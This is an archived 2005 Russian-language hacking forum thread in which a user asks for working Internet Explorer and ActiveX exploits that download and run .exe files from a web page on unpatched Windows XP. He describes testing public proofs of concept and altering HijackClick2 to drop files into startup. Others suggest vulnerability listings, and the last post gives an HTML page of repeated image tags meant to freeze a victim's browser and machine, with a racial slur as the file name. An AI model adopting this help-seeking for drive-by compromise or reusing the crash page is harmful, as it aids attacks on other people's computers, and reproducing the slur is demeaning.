PDA

Просмотр полной версии : ActiveX and IE bugs (да блин! я всех спрашивал!)

andlog6
30.05.2005, 07:16
Загрузка и запуск .exe с web страницы через IE и ActiveX баги

актуальна ли эта тема сейчас? Есть ли что нибудь подобное, только для XP? Чтоб работало если update'ов нет пол года или год? Пожалуста ответьте! Или хотя бы дайте ссылки какие-нибудь
Morph
30.05.2005, 07:34
Если спрашивал у всех тогда обращался к определенному человеку а?
Так и пиши сразу чтобы все поняли.

А эту тему я закрываю =))
Шутка.
JazzzSummerMan
30.05.2005, 10:17
andlog6
Много таких уязвимостей. только они не стабильные, работоспособность зависит от многих факторов имхо. хотя во внимание обычно принимается только пара ОС-Браузер
Зайди на http://securitylab.ru , набери на главной в поиске Internet Explorer и листай страницы с уязвимостями, тебе на долго хватит))
andlog6
30.05.2005, 12:44
я как раз это и делаю сейчас, и проверяю некоторые, среди тех что запускают файл, не одна ещё не сработала на моем непропатченном с Декабря (2004) Иксплорере (sp1) такое чувство что вообще ничего не работает, зря осла ругают
Че Гевара
31.05.2005, 17:42
Почему не работает ? Если на паблике просто не так много рабочих эксплоитов для Ie, то это не значит что их нет ...
andlog6
07.06.2005, 14:47
таак, установил, новую XP с SP1, СПЕЦИАЛЬНО для тестирования, проверил немало. Такой чуство что модеры багтраков просто перепечатывают PoC и описания друг у друга не проверяия на работоспособность. Где то 8 из 10 не работают на непропатченном Ихплорере. дл сих пор нормального не нашел. Народ, будь другом, укажи сайты на которых их собственно тестируют и отлаживают. Позарез надо :)
Algol
07.06.2005, 17:12
Такой чуство что модеры багтраков просто перепечатывают PoC и описания друг у друга не проверяия на работоспособность.
Конечно, так оно и есть ... Багтреки просто публикуют обнаруженные кем-то уязвимости, сами они никогда их не проверяют...
Rebz
07.06.2005, 17:29
Кстати тоже самое можно сказать и про эксплоиты, которые выложены в паблике. Многие из них могут не работать, при компилляции возникает синтаксическая или иная ошибка. Это так называетмая "защита от дураков". Ты должен сам посмотреть исходник эксплоита, разобраться что он и как делает и устранить намеренно сделанную ошибку. -)
Morph
07.06.2005, 19:14
Ага или самому написать глядя на него =))
andlog6
07.06.2005, 21:28
да я так уже и сделал с HijackClick2 чтоб он в startup сбрасывал, но я не знаю, работает ли он на более поздних версиях? например SP2

Но все таки если сайты кто-нибудь знает то буду очень благоарен ($)
Kr@b!
23.06.2005, 12:52
Если хочешь просто подвесить машину, то создай страницу с кодом:
<html>
<body>
<img src=nigger.jpg width=1 height=1 />
<img src=nigger.jpg width=1 height=1 />
<img src=nigger.jpg width=1 height=1 />
<img src=nigger.jpg width=1 height=1 />
<img src=nigger.jpg width=1 height=1 />
.
.
.
.
.
.
.
.// и т.п.
</body>
</html>
ослик зависнет, а за одно и всю тачку подвесит!!
:D :D :D :D